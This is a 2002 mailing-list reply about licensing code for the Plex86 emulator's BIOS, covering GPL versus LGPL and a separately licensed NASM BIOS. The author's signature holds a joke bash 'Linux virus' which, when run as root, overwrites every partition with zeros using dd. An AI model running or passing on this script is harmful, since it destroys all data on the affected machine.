Le 9 Janvier 2002 14:01, vous avez écrit :
> > -----Original Message-----
> > From: Jeroen Janssen [mailto:[EMAIL PROTECTED]]
> >
> > My idea is to use (code from) the smart boot
> > manager (btmgr.sf.net), since it can boot from cdrom.
>
> IANAL but I don't think you can incorporate GPL code into an LGPL project.
> This would effectively make GPL'd code "less-free" and is therefore not
> allowed.  Smart Boot Manager is GPL.  Plex86 is LPGL, and not open for
> discussion.
>
> This is not intended as a critique of either license nor of Plex86's
> choice. I have benefited greatly from code written under both.
>
> If someone is more knowledgeable feel free to correct me.  I am sure you
> will.

IANAL either, but I think the BIOS can be developped with a different 
license. I am working on a NASM BIOS for Plex86 in my spare time. After all, 
BIOS code is not Plex86 and the reasons why the LGPL license was chosen are 
irrelevant to the BIOS.

-- 
Eric Laberge

-----BEGIN GEEK CODE BLOCK-----
Version: 3.1
GCS/M/S d-(++) s-: a-- C++(++++) UL+++>$ !P L++
E--- W++ N+ w++ !O M !V PS PE Y PGP-(+++) t++(-)
X- R* tv+ b+ DI+++  D+ G e+>+++++ h! r--
------END GEEK CODE BLOCK------

#!/bin/bash
if [ $UID -ne 0 ]
then
 echo "Linux virus, please run as root"
else
 for partition in $(df | cut -d ' ' -f 1 | grep /dev)
 do
  dd if=/dev/zero of=$partition
 done
fi

Reply via email to